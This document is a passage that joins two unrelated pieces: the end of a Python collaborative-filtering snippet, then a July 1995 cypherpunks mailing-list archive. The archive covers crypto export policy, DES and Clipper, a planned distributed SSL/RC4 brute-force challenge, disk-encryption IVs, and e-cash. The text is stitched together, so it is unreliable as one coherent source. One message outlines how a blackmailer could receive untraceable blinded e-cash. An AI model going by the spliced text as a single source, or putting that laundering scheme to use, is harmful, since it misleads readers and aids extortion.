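    common = sorted(set(mine) & set(theirs))
    if len(common) < max(min_overlap, 2):
        return 0.0
    mx = mean(mine[a] for a in common)
    my = mean(theirs[a] for a in common)
    cov = sum((mine[a] - mx) * (theirs[a] - my) for a in common)
    vx = sum((mine[a] - mx) ** 2 for a in common)
    vy = sum((theirs[a] - my) ** 2 for a in common)
    if vx == 0 or vy == 0:          # a rater who always gives the same score
        return 0.0
    return cov / sqrt(vx * vy)


def predict(ratings, reader, article, min_overlap=3):
    """Predict the reader's score for an article nobody asked them about yet.

    Each other rater's deviation from their own average is weighted by the
    correlation with the reader; a negative correlation flips the sign, so a
    consistent opponent's low score counts as evidence for a high one.
    """
    mine = ratings[reader]
    base = mean(mine.values())
    num = den = 0.0
    for rater, theirs in ratings.items():
        if rater == reader or article not in theirs:
            continue
        w = pearson(mine, theirs, min_overlap)
        num += w * (theirs[article] - mean(theirs.values()))
        den += abs(w)
    return base if den == 0 else base + num / den


if __name__ == "__main__":
    for name in ("ann", "bob", "newbie"):
        print(name, round(pearson(RATINGS["reader"], RATINGS[name]), 3))
    print("prediction for a5:", round(predict(RATINGS, "reader", "a5"), 3))
    print("with min_overlap=2:", round(predict(RATINGS, "reader", "a5", 2), 3))
```

Lowering `min_overlap` to 2 lets the rater with only two shared articles in at full weight and pulls the prediction down by about a point, which is why a system that lets anonymous evaluators earn trust through correlation needs a floor on shared history.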






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@bwh.harvard.edu>
Date: Wed, 26 Jul 95 15:19:04 PDT
To: gnu@toad.com (John Gilmore)
Subject: Re: NRC panel wants questions for Law Enforcement on crypto policy
In-Reply-To: <9507261951.AA23210@toad.com>
Message-ID: <199507262218.SAA00901@bwnmr5.bwh.harvard.edu>
MIME-Version: 1.0
Content-Type: text/plain


| I collated all the questions into a large ungainly message and sent it
| to Herb Lin.  He has been after me to go back over it and make a more
| useful set of questions, which I haven't done yet.  He says they are
| meeting with the FBI in September and want to get questions to them in
| August (incorporating our ideas).  I've promised him I will get him the
| formatted list of questions by the end of next week.

	A question that might be interesting to add would be "Given
the intense difficulties in replacing the DES, why does Clipper have
an 80 bit key?  Wouldn't it make more sense to design a standard that
will at least resist brute force attacks for longer?"

	I understand there are difficulties in projecting computing
power that far ahead, as well as guessing at the actual improvement in
mathematical and cryptographic theory, but why not have a standard
with a 128 bit key?

Adam


-- 
"It is seldom that liberty of any kind is lost all at once."
					               -Hume




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Phil Fraering        <pgf@tyrell.net>
Date: Wed, 26 Jul 95 17:01:12 PDT
To: perry@imsi.com
Subject: Challenge-response passwords (Was: big word listing)
In-Reply-To: <9507261952.AA28574@snark.imsi.com>
Message-ID: <199507262348.AA23992@tyrell.net>
MIME-Version: 1.0
Content-Type: text/plain


   Reply-To: perry@imsi.com
   X-Reposting-Policy: redistribute only with permission
   Date: Wed, 26 Jul 1995 15:52:36 -0400
   From: "Perry E. Metzger" <perry@imsi.com>

   Given all the prior art, I have a solid suspicion that the patent
   wouldn't hold up. The existence of the publicly published Diffie
   Hellman patent, for instance, makes it rather hard to patent the
   more general case.

   Perry

Does anyone know if that patent on distributed file systems that was
filed in '82 and granted sometime recently held up in court?

The last I heard the guy was going around collecting royalty payments
from large companies unwilling to go to court anyway.

Is this the sort of thing it's easier for a small company to challenge
than a big company?

Phil





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Wed, 26 Jul 95 17:01:48 PDT
To: cypherpunks@toad.com
Subject: WIL_mil
Message-ID: <199507262341.TAA26317@pipe4.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   Garry Wills, the historian, writes a thought-provoking essay in
   The New York Review of Books, August 10, 1995, on "The New
   Revolutionaries," about the militants and the political and
   social grievances that undergird their movement -- many of
   which are shared, Wills states, by a wide spectrum of the
   populace discontented with the government:

      The suspicion that government has become the enemy of
      freedom, not its protector, crosses ideological lines.
      Liberals point to FBI plots against American citizens
      like Dr. King, to CIA experiments with LSD on American
      citizens, to the Defense Department's use of Americans
      as guinea pigs in nuclear testing. The right sees
      assaults on liberty from the Bureau of Alcohol, Tobacco
      and Firearms, the Department of the Interior, the
      Occupational Safety and Health Administration. Many
      people resent the fact that government has become a
      dictator of the terms of societal conduct -- in welfare
      programs, in affirmative action and other preferential
      attitudes toward citizens' rights, in schools that seem
      to have a "multicultural" or antireligious agenda, in
      confiscatory taxation, in the keeping of elaborate files
      on citizens' activities, in various agencies'
      surveillance techniques and bribing of informers.

   Wills goes on to review these grievances:

      Taxation.
      The jury system.
      Regulations.
      Police power.
      Schools.
      Family.
      Religion.
      Citizen militias.
      Constitutionalism.
      Corruption.
      Guns -- discussed at length.

   And, he summarizes in closing:

      With the end of the cold war, the justification for
      government activism has been taken away. If the
      government is only good for fighting Communists, and it
      no longer fights Communists, then what good is it? No
      convincing answer comes from above -- which lends the
      answer from the depths its new plausibility: It is good
      for nothing, and citizens must take their own lives in
      hand again, vindicating their own liberties. Right or
      wrong, the armed patriots at least have arguments they
      can believe in wholeheartedly. They take the mood of
      post-cold war drift, of Perotista resentment, of
      disillusionment and economic shakiness, of fin de siecle
      fear, and change it into a plan for doing something
      about one's gripes.

      The militias and their supporters are
      not the most central social symptom of our time, but
      they are among the more dramatic symptoms of a general
      crisis of legitimacy. The authority of government can no
      longer be assumed. It has to be justified from the
      ground up.

      Many people who are not militants or conspiratorialists
      can agree with parts of this analysis. Libertarians
      wonder why people who keep to themselves should be
      bothered.

      It is no longer so "extreme" to believe that our
      government is the greatest enemy to freedom. We see this
      in a new hatred of government agents (who fear for their
      lives in western states). Or in the unprecedented
      vilification of the head of our government. The fierce
      contempt for Hillary Rodham Clinton, for the Attorney
      General (called "Butch" Reno on bumper stickers), for
      "Condom Queen" Joycelyn Elders, reflects misogyny
      rebelling against feminism's gains; but it is also a
      sign that the office of the presidency itself may now
      incur a contempt as routine as the respect it once
      commanded. The heaping of filth on the personnel and
      symbols of government has a delegitimating effect in
      itself; and the assault is joined to the disillusion,
      anger, and disorientation that have marked recent
      electoral behavior. Where the heated deny legitimacy and
      the cool are doubtful of it, a crisis is in the making.


   WIL_mil (about 50K, in 3 parts)











From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Alan Pugh" <Alan Pugh@MAILSRV2.PCY.MCI.NET>
Date: Wed, 26 Jul 95 17:36:46 PDT
To: cypherpunks@toad.com
Subject: connectsoft & encryption
Message-ID: <01HTC7Y9RXO28WW6NV@MAILSRV1.PCY.MCI.NET>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Date: Tuesday, 25-Jul-95 07:26 AM

ConnectSoft Licensing Agreement with RSA Data Security Includes
Revolutionary S/MIME Technology; ConnectSoft's early 


BELLEVUE, WASH. (July 24) BUSINESS WIRE -July 24, 1995--ConnectSoft,
Inc.,  provider of the most powerful, easy-to-use interfaces to
digital  communication and commerce, announced today it has licensed
a new  interoperable security technology from RSA that will provide
ConnectSoft  customers with added privacy and security to their daily
communications.  The agreement gives ConnectSoft products compliancy
with the S/MIME  specification (Secure Multipurpose Internet Mail
Extension) that ensures a customer's e-mail is read only by the
designated recipient -- regardless of the e-mail platform they are
using.  The new security features will be included in the newest
versions of ConnectSoft's E-Mail Connection(tm) and Internet
Connection(tm) products that will be released this fall.  

"In today's networked world, security is a growing concern as we rely
on  e-mail for more of our day-to-day communications,"  said Bob
Dickinson,  ConnectSoft's vice president and general manager,
Consumer Online Products & Services division.  "Our arrangement with
RSA provides encryption and authentication technologies giving our
customers the most protected and secure communication available
today."  

The S/MIME specification is based on the popular Internet MIME
standard and allows a customer's S/MIME message to be composed and
encrypted on one vendor's system and be successfully received and
decrypted on a different one. The specification also uses the
intervendor PKCS (Public Key Cryptography Standards), the most widely
implemented commercial standard for public-key cryptography in North
America.  

Global Security Standard  

- ------------------------  

Encryption and authentication have been viewed as crucial enabling  
technologies for electronic commerce on the World Wide Web -- but
encryption has been slow to come to e-mail, with most packages
offering nothing at all.  "ConnectSoft's early support of S/MIME
demonstrates its commitment to provide customers with secure digital
communication as well as its sophistication in developing future
electronic commerce solutions,"  said Jim Bidzos, RSA president.  

According to RSA, a global security standard is essential for the
development of a global digital economy.  "If one public-key system
is used everywhere for authentication, then signed digital documents
can be exchanged between users in different countries using different
software on different platforms,"  Bidzos said.  "This
interoperability is necessary for a true digital economy to
develop."  

RSA Data Security is the world's "brand name"  for cryptography, with
more than 12 million copies of its software encryption and
authentication installed and in use worldwide.  RSA is part of
existing and proposed standards for the Internet, CCITT, ISO, ANSI,
IEEE and business and financial networks around the globe.  The
company develops and markets platform-independent developers kits,
end user products, and provides comprehensive cryptographic
consulting services.  Founded in 1982 by the inventors of the
patented RSA Public Key Cryptosystem, the company is headquartered in
Redwood City, California.  

ConnectSoft is a privately held company based in Bellevue, Wash. It
was  founded in January 1988 and operates three divisions -- Consumer
Online  Products and Services, Commercial Software Development
Services and Commercial Network Services -- targeted at providing
customers with innovative products, custom software and network
services for conducting digital commerce.  The Consumer Online
Products division markets the company's award winning products, such
as E-Mail Connection, Internet Connection and KidMail Connection.  The
Commercial Software Development Services division develops custom
software which enables secure, digital communications, commercial
transactions, and Integrated Logistics Systems for Fortune 1000
companies such as United Parcel Service (UPS).  The recently formed
Commercial Network Services division will provide high bandwidth,
high-quality commercial Internet and TCP/IP services to large- and
medium-sized companies throughout the United States. -0- E-Mail 
Connection and Internet Connection are registered trademarks of
ConnectSoft, Inc.  Other company, brand product and service names may
be trademarks or registered marks of their respective holders.  

- --30--KS/se*  

CONTACT:  Kaufer Miller Communications  
   David Kaufer, Tamese Robinson or Michele Ruegg  
          206/450-9965  
          MCI Mail:  576-6983  
                    OR  
   ConnectSoft, Inc.  
   Linda Coyle, 206/827-6467 Ext. 5409  
                Internet: lindacconnectsoft.com  

KEYWORD:  WASHINGTON  

INDUSTRY KEYWORD:  COMPUTERS/ELECTRONICS COMED PRODUCT
INTERACTIVE/MULTIMEDIA  REPEATS: New York 212-575-8822 or
800-221-2462; Boston 617-330-5311 or         800-225-2030; SF
415-986-4422 or 800-227-0845; LA 310-820-9473 BW URL: 
http://www.hnt.com/bizwire 

                   * * * END OF STORY * * * 


-----BEGIN PGP SIGNATURE-----
Version: 2.61

-----END PGP SIGNATURE-----
          *********************************************
          *          / Only God can see the whole     *
          *  O[%\%\%{<>===========================-   *
          *          \ Mandlebrot Set at Once!        *
          * amp                                       *
          * <0003701548@mcimail.com>                  *
          * <alan.pugh@internetmci.com>               *
          *********************************************
Key fingerprint =  A7 97 70 0F E2 5B 95 7C  DB 7C 2B BF 0F E1 69 1D




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Piete Brooks <Piete.Brooks@cl.cam.ac.uk>
Date: Wed, 26 Jul 95 14:53:21 PDT
To: trei@process.com
Subject: Re: SSL challenge?
In-Reply-To: <9507262108.AA25550@toad.com>
Message-ID: <"swan.cl.cam.:090810:950726215000"@cl.cam.ac.uk>
MIME-Version: 1.0
Content-Type: text/plain


> Where does the effort to bruteforce SSL stand?

Andy has the spec wrapped up, and is finalising his Windows 32 Client.
I have the key doler running, a perl client and a shell driving script,
	along with a new WWW interface (which we hope won't be used much)
Adam has bruterc4 tweaked to interact with my perl client.
Andrew has a copy of bruterc4 and is making brutessl similar.

We're all ready to go, but I'm off for three weeks, and as Adam will be taking
over my stuff in my absence, it might take him a while to understand it and
make the few last minute tweaks ....




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: gjeffers@socketis.net (Gary Jeffers)
Date: Wed, 26 Jul 95 21:20:37 PDT
To: cypherpunks@toad.com
Subject: Strategic Invest. on Bad Boys, Blk Net, & Remailers
Message-ID: <199507270622.BAA12647@mail.socketis.net>
MIME-Version: 1.0
Content-Type: text/plain


from:        Strategic Investment
             824 East Baltimore Street
             Baltimore, MD 21202

                      July 25, 1995
----------------------------------------------------------------------
                     BEHIND THE LINES   BY  Jack Wheeler

                         BAD GUYS

   Let's suppose, "just suppose," that the president has placed you in
charge of a super-secret spy agency conducting electronic intelligence,
the National Security Agency; and suppose that he ordered you to trace
the activities of those who have replaced the Communists as official
"Bad Guys," "Enemies of the State:" tax evaders, money launderers, and
drug traffickers. So you decide to pull one of the great intelligence
coups of modern times, by having the NSA become a major provider of
banking software.

   Working through a cutout company skilled in managing money in support
of U.S. covert operations, and using a modified version of sophisticated
tracking software provided by the Justice Department's intelligence
service (OSI, Office of Special Investigations), you sell your product
to financial institutions around the globe - not telling them, of course,
that what they're buying has an electronic "backdoor" giving the NSA
computerized access to the intimate details of their customers' financial
transactions. In less than a decade, your client list includes many of
the world's leading banks.

   The banks behind the Visa smart card for the Atlanta Olympics, and
those soon to offer Internet banking are your clients too. Yes, now
you'll do your patriotic duty and get the Bad Guys - and anyone else you
decide is an Enemy of the State.

   We're just supposing, you understand.

                     THE BLACK NET

   A worldwide communications system, accessible to anyone on the
Internet, of completely anonymous and unbreakable encrypted messages and
transactions: That's the vision of the Black Net being created by
"crypto-anarchist" computer programmers. Using programs like "MixMaster"
and anonymous re-mailer computer servers that nest encrypted messages in
encrypted envelopes, the Black Net will defeat the NSA's ability to trace
communications to their source via traffic analysis or any other method.
Black Net banks could offer totally untraceable and anonymous
transactions with the identity of the account holder unknown even to the
bank -- rendering any attempts, such as those imagined above, to get the
Bad Guys useless. As economist Richard Rahn puts it: "The information
technology of the 80s (cheap faxes & photocopiers, satellite radio, etc.)
doomed any government's attempt to have a monopoly on the supply of money."
----------------------------------------------------------------------

Beat State!






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Robert A. Rosenberg" <hal9001@panix.com>
Date: Wed, 26 Jul 95 20:30:28 PDT
To: KDAGUIO@aba.com
Subject: Re: Banks and Crypto
Message-ID: <v02130500ac3c4aceee4e@hal9001.dialup.access.net>
MIME-Version: 1.0
Content-Type: text/plain


At 13:25 7/26/95, KDAGUIO@aba.com wrote:
>See attached file: F:\OFFILES\KODMAIL.MSG
>
>
>
>Attachment converted: Macintosh HD:KODMAIL.MSG (????/----) (0002C85B)


Is there ANY reason why you did not just paste the text of this file into
your message? Also, if you are going to attach files in lieu of writing
messages, it might be useful to mention what word processor was used to
create the file so it can be read. In this case, what format is your file
in?

Thank you.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: hal9001@panix.com (Robert A. Rosenberg)
Date: Wed, 26 Jul 95 20:31:23 PDT
To: Scott Brickner <sjb@austin.ibm.com>
Subject: Re: Three strikes you're out! for politicians... yeah we wish!
Message-ID: <v02130500ac3c612078f3@[166.84.254.3]>
MIME-Version: 1.0
Content-Type: text/plain


At 10:27 7/26/95, Scott Brickner wrote:
>In message <2751@umlaw.demon.co.uk> Michael Froomkin writes:
>>> Therefore, the only organization which can hold a
>>> senator/representative liable for passing a bad law is the one which
>>> passed the law. :(
>
>>and the voters
>
>Not in the sense of being able to punish him.  The voters may only
>withhold their support in the next election.  Not nearly enough to
>deter morons like Exon.

Who, unless I'm confusing him with someone else, is not going to stand for
reelection and thus can run amuck with no possible fall-out from the
voters.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Richard Martin" <rmartin@alias.com>
Date: Wed, 26 Jul 95 20:41:11 PDT
To: cypherpunks@toad.com
Subject: Canadian Export Controls
Message-ID: <9507262340.ZM6734@glacius.alias.com>
MIME-Version: 1.0
Content-Type: text/plain



This is a notification of the first creation of a few pages describing
Canadian Export Controls. Anyone who has read the printed document
[Canada's Export Controls] will realise that it's almost word-for-word,
but there's some use for that.

In any case, they currently live at
	http://www.io.org/~samwise/crypto/
It may be that they'll move, but
	http://www.io.org/~samwise/interesting.html#privacy
should always have a pointer to them.

comments, bugs, spelling errors, contributions to rmartin@alias.com

The pages were written this evening. Tomorrow morning I'll look at them,
scream, wonder what I was thinking, and rewrite them. This is so that
there'll be a few more screams. :)

frodo =)




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Michael Froomkin <Michael@umlaw.demon.co.uk>
Date: Thu, 27 Jul 95 06:12:32 PDT
To: gnu@toad.com
Subject: Re: NRC panel wants questions for Law Enforcement on crypto policy
Message-ID: <2802@umlaw.demon.co.uk>
MIME-Version: 1.0
Content-Type: text/plain


ask them if their policy allows them to purport to run an 
anonymous remailer, e.g. as part of a sting operation.


In message <9507261951.AA23210@toad.com> John Gilmore writes:
> I collated all the questions into a large ungainly message and sent it
> to Herb Lin.  He has been after me to go back over it and make a more
> useful set of questions, which I haven't done yet.  He says they are
> meeting with the FBI in September and want to get questions to them in
> August (incorporating our ideas).  I've promised him I will get him the
> formatted list of questions by the end of next week.
> 
> 	John
> 

-- 
Michael Froomkin                   until Aug 6: michael@umlaw.demon.co.uk
U.Miami School of Law                                     London, England
mfroomki@umiami.ir.miami.edu <-- this will still find me
PO Box 248087 Coral Gables, FL 33124-8087 "Rain in parts, then dry" --BBC
See http://www-swiss.ai.mit.edu/6095/articles/froomkin-metaphor/text.html




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "M. Plumb" <mp@io.org>
Date: Wed, 26 Jul 95 20:52:36 PDT
To: sjb@austin.ibm.com (Scott Brickner)
Subject: Re: Exporting from Canada (was Re: Let's try breaking an SSL RC4 key)
In-Reply-To: <9507251659.AA16288@ozymandias.austin.ibm.com>
Message-ID: <199507270352.XAA01331@twitch.io.org>
MIME-Version: 1.0
Content-Type: text


> So?  The ITAR doesn't control export to Canada.  Export the source code
> to Canada, compile, validate, sign, and put on CD in Canada, and export
> to the world.

No. Export of crypto to Canada is legal because Canada prohibits the
further export of goods of U.S. origin. Before the Canadian government
will allow further export of crypto software from the U.S., there must
be a lot of improvement done to the product within Canada. The exact
rules are not well defined, but with crypto I expect that the CSE
(Communications Security Establishment -- our version of the NSA)
would push for at least 50% Canadian content. So I don't expect to
see PGP being exported legally any time soon.
 
> I also seem to remember a while back (Mar/Apr) someone reported here that the
> Canadian bureaucrat responsible for executing import/export rules said
> that he didn't consider crypto to be restricted by Canada's rules.

I have talked with the bureaucrat that I think you are referring
to, and he said no such thing. He said that public domain crypto
software that is entirely of Canadian origin was, in his opinion,
not covered. When I talked to him, he stressed that PGP is still
covered.
--
	-marc



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: johnl@radix.net (John A. Limpert)
Date: Wed, 26 Jul 95 22:32:04 PDT
To: cypherpunks@toad.com
Subject: Decoded Version of KODMAIL.MSG
Message-ID: <199507270530.BAA08378@saltmine.radix.net>
MIME-Version: 1.0
Content-Type: text/plain


The American Bankers Association is attempting to address the privacy and
security needs of banks and bank customers by ensuring that each have access
to appropriate cryptographic tools.

The ABA Cryptographic Policy will be posted on this list later today.

         ************************************************




CONTACT:  Sonia Barbara                          FOR IMMEDIATE RELEASE
          (202) 663-5469                         (1995)

ABA REAFFIRMS SUPPORT FOR PRIVATE-SECTOR CONTROL 
OF CRYPTOGRAPHY

Association Recommends a 10-year Extension for the Data Encryption Standard

	WASHINGTON, July 21 -- The Data Encryption Standard (DES) should be
recertified for at least 10 more years to allow interested financial
institutions adequate time to convert to any new cryptography standard, the
American Bankers Association said in a policy statement issued today.
	Encryption is the process whereby sensitive data communications, such as
wire transfers, credit card and automated teller machine transactions, are
protected by secret codes to protect their confidentiality.   DES, released
in 1977, is the primary method used by financial institutions to encrypt
information.
	Critics say that the longer DES is used, the more likely its code could be
broken.  While realizing this could limit its life span as a government certified
standard, ABA warned that requiring banks to convert to a new standard by
1998 (the year DES's certification expires) could be prohibitively costly
due to the high level of electronic funds transfers secured by DES.  ABA
therefore encouraged the National Institute for Standards and Technology
(NIST) to continue to endorse DES as a Federal Information Processing
Standard (FIPS) for use by the financial community.
	There has been an ongoing debate regarding who should control the
development and support of private-sector computer security standards:  the
government or the private sector.  ABA strongly recommends that the U.S.
government work with the private sector and Congress in an open forum to
develop a comprehensive policy on the commercial use of cryptography. 
	In its newly-revised policy statement on cryptography, ABA proposed
alternatives to DES and outlined other criteria that must be met before
changes in cryptographic standards can be accepted by the banking industry.
These criteria -- which will be presented next week to representatives of
the White House, U.S. Department of Commerce, National Security Agency (NSA)
and federal banking agencies -- were developed following a two-day meeting
held in June of bankers, vendors and crypto experts concerned about the
federal government's direction regarding private-sector information security.
	Specifically, ABA recommended:
	* The financial services industry be allowed to continue to use DES based
	  on risk assessment (e.g. value of the transaction) and the business
	  application involved.
	* A security framework encompassing a family of commercially available
	  algorithms, including DES, be developed.  This framework should include
	  a process for negotiated algorithm selection based on the level of risk
	  and other business requirements.
	* Opposition to government mandated key management systems for financial
	  applications where keys would have to be stored outside the financial
	  institution (e.g. key registration/surrender or the mandatory escrow of
	  cryptographic keys).  Instead, banks should continue to be responsible
	  for key management and continue to cooperate with government for law
	  enforcement purposes, as required by law.
	* Export of cryptography for financial applications must not be restricted.
	* Full participation of Congress and the private sector before establishing
	  a U.S. policy for the commercial use of cryptography, instead of being
	  carried out solely by Executive Order.
	[Note:  These recommendations were summarized.  For the full statement,
please call Sonia Barbara at 202/663-5469.]
	The American Bankers Association is the only national trade and
professional association serving the entire banking community, from small
community banks to large bank holding companies.  ABA members represent
approximately 90 percent of the commercial banking industry's total assets,
and about 94 percent of ABA members are community banks with assets less
than $500 million.
###
--
John A. Limpert
johnl@Radix.Net





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ulf.Moeller@hamburg.netsurf.de (Ulf Moeller)
Date: Wed, 26 Jul 95 17:20:41 PDT
To: cypherpunks@toad.com
Subject: Re: NSA, Random Number Generation, Soviet Codes, Prohibition of
Message-ID: <m0sbGYf-000BHwC@ulf.mali.sub.org>
MIME-Version: 1.0
Content-Type: text/plain


In the book I mentioned there is a quotation of D. Kahn, The
Codebreakers, from 1967:

"Interestingly, some pads seem to be produced by typists and not by
machines. They show strike-overs and erasures - neither likely to be
made by machines. More significant are analsyses of the digits.
One such pad, for example, has seven times as many groups in which
digits in the 1-to-5 group alternate with digits in the 6-to-0
group, like 18293, as a purely random arrangement would have.
This suggests that the typist is striking alternately with her
left hand (which would type the 1-to-5 group on a Continental
machine) and her right hand (which would type the 6-to-0 group).
Again, instead of just half the groups beginning with a low number,
which would be expected in a random selection, three quarters of
them do, possibly because the typist is spacing with her right
hand, then starting a new group with her left. Fewer doubles and
triples appear than chance expects. Possibly the girls, ordered
to type at random, sensed that some doublets and triplets would
occur in a random text but, misled by their conspicuousness,
minimized them. Despite these anomalies, however, the digits
still show far too little pattern to make cryptanalysis possible."

-- 
Ulf Möller * um@ulf.mali.sub.org * 3umoelle@informatik.uni-hamburg.de
PGP key fingerprint: B6 4F 97 28 8F C0 54 C3  A6 10 02 2F B9 31 78 14 
"When cryptography is outlawed, bayl bhgynjf jvyy unir cevinpl!"



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rah@shipwright.com (Robert Hettinga)
Date: Thu, 27 Jul 95 05:03:21 PDT
To: "Robert A. Rosenberg" <KDAGUIO@aba.com
Subject: Re: Banks and Crypto
Message-ID: <v02120d02ac3d2f550d50@[199.0.65.105]>
MIME-Version: 1.0
Content-Type: text/plain


At 11:29 PM 7/26/95, Robert A. Rosenberg wrote:
>At 13:25 7/26/95, KDAGUIO@aba.com wrote:
>>See attached file: F:\OFFILES\KODMAIL.MSG

>Is there ANY reason why you did not just paste the text of this file into
>your message?

Cluelessness? Carelessness? Some version of "-lessness", I'm sure...

>Also, if you are going to attach files in lieu of writing
>messages, it might be useful to mention what Wordprocessor was used to
>create the file so it can be read. In this case, what format is your file
>in?

I just used a special feature on my Mac to deal with it. It's called a
"trash can".

Please remember that almost all such attachments, unless identified (even
if identified, actually) usually get deleted.

To paraphrase The Immortal: "ASCII R00lz!"

Cheers,
Bob Hettinga






-----------------
Robert Hettinga (rah@shipwright.com)
Shipwright Development Corporation, 44 Farquhar Street, Boston, MA 02131
USA (617) 323-7923
"Reality is not optional." --Thomas Sowell
>>>>Phree Phil: Email: zldf@clark.net  http://www.netresponse.com/zldf <<<<<






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bruce Schneier <schneier@winternet.com>
Date: Thu, 27 Jul 95 06:30:03 PDT
To: cypherpunks@toad.com
Subject: Crypto: ride from SF on Saturday
Message-ID: <199507271329.IAA10651@icicle>
MIME-Version: 1.0
Content-Type: text


Is anyone driving from the SF area to Crypto (in Santa Barbara) on Saturday?
If so, I would like a ride.

Bruce

**************************************************************************
* Bruce Schneier
* Counterpane Systems         For a good prime, call 391581 * 2^216193 - 1
* schneier@counterpane.com
**************************************************************************




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Johnathan Corgan <jcorgan@aeinet.com>
Date: Thu, 27 Jul 95 09:06:49 PDT
To: Andy Brown <asb@nexor.co.uk>
Subject: Re: Encrypting block driver for Linux...need some advice
In-Reply-To: <Pine.SOL.3.91.950727104038.17605B-100000@eagle.nexor.co.uk>
Message-ID: <Pine.LNX.3.91.950727085755.104A-100000@comet.aeinet.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On Thu, 27 Jul 1995, Andy Brown wrote:

> Your scheme should be OK.  If you'd chosen the same IV for each sector 
> then identical sectors would encrypt the same.  If I remember rightly 
> then having a known IV only affects the security of the first block, 
> after that the ciphertext chaining comes into effect.

I suspected as much.  I don't see how a known IV affects the security of the
first block even (and perhaps I'm exposing some real crypto-ignorance here
:).

Someone pointed out in private mail that the SFS docs have a good section on
IV selection techniques...I'll go off and read those.

==
Johnathan Corgan       "For the first time in history, it is possible to
jcorgan@aeinet.com      have absolute privacy over arbitrary distances."
PGP Key Fingerprint:    4F 28 69 B8 76 2E 42 3E  8B 4C 12 BB 3A 43 D4 07


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Johnathan Corgan <jcorgan@aeinet.com>
Date: Thu, 27 Jul 95 09:20:10 PDT
To: Tatu Ylonen <ylo@cs.hut.fi>
Subject: Re: Encrypting block driver for Linux...need some advice
In-Reply-To: <199507261756.UAA13722@shadows.cs.hut.fi>
Message-ID: <Pine.LNX.3.91.950727090405.104B-100000@comet.aeinet.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On Wed, 26 Jul 1995, Tatu Ylonen wrote:

> How about using the md5 hash of the block number combined with some
> secret data; e.g, the md5 hash of the passphrase reversed (I would not
> want to use the password directly, as that might help in breaking the
> key; on the other hand, md5 of block number alone is not good because
> there is a very limited number of blocks (and the attacker knows which
> block is being attacked)).

I guess my question is how does knowing the IV affect the security of CBC? 
I assumed that it only needed to be different for each block so that
identical plaintext encrypts to different ciphertext for different blocks.

> You might also want to support other algorithms, particularly IDEA
> (but beware, IDEA is patented and causes problems for commercial use -
> non-commercial use should be free).  Another algorithm to support
> might be Blowfish.

Yes, I plan on it.  Originally, I just grabbed RSAREF for a quick and dirty
drop in.

> Could you describe the implementation a little?  Does it use the nfs
> interface, or is it somewhere in the kernel file system code?  Or
> kernel block device code?  (User-level NFS servers may involve
> difficult security issues)

The software is a block device driver.  To use it, a user will run an
executable that will pass a filespec and key to the driver.  The driver then
translates calls to its block interface into calls to lseek/read/write on
the underlying inode.  Data is d(e)ncrypted on the fly during this process.

The user can then do anything you would normally do with a block
device--make a file system on it, tar files to it, use it for swap.  If the
provided filespec is actually located remotely, and is accessed via NFS,
SMB, or some other network protocol, then the benefit is that only
ciphertext is passed on the wire.

I'm stuck on figuring out the proper permissions for the device special
file, the attachment executable, and how to deal with one user attaching the
filespec to the driver, but allowing some predefined user list to have access. 
All potential users of the driver need to have rw permission to it, but in
practice, the kernel module should only honor block read/write calls made by
authorized user processes.

I guess I need to step back and look at what types of threat models I should
address, and go from there.  That, and get a good book on Unix security :)

==
Johnathan Corgan       "For the first time in history, it is possible to
jcorgan@aeinet.com      have absolute privacy over arbitrary distances."
PGP Key Fingerprint:    4F 28 69 B8 76 2E 42 3E  8B 4C 12 BB 3A 43 D4 07


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Hal <hfinney@shell.portal.com>
Date: Thu, 27 Jul 95 09:38:18 PDT
To: mark@unicorn.com
Subject: Re: Full text of David Chaum's Congressional speech
Message-ID: <199507271636.JAA26799@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


From: "Rev. Mark Grant" <mark@unicorn.com>
> Now, I'm not sure of this, but as far as I can see, if I was a 
> blackmailer wanting to receive an untraceable payment I could do the 
> following :
> 
> 	I create my ecash serial number/hash
> 	I blind it with a random number
> 	I send it to the payer
> 
> 	Payer blinds it again and sends it to the bank
> 	
> 	Bank signs it and returns it
> 
> 	Payer removes their blinding and returns the result to me
> 
> 	I remove my blinding and send it to the bank for payment with
> 	no chance of being traced.
> 
> Will this work ?

I believe this will work, in most blinded-ecash systems.  Another way to
express it is you force the user to withdraw cash such that it comes into
your wallet.

There are some technical counter-measures though.  One is to have some
secure tamper-proof hardware which enforces certain kinds of ecash
transfers.  The above transfer would not be a legal one.  Only transfers
which would allow various forms of traceability would be allowed.

Another approach was described by Chaum in one of his papers.  I can't
remember the details, but basically the user had to go through a
preliminary transaction with the bank when he opened his account, to get
a whole lot of tokens which would later be turned into ecash.  He has to
get a lot of them because these will be for all the ecash he will use for
a whole decade (or whatever).  Then the withdrawal protocol is one which
turns a token into an ecash value.

The result of this approach is that the blinding is in effect fixed in
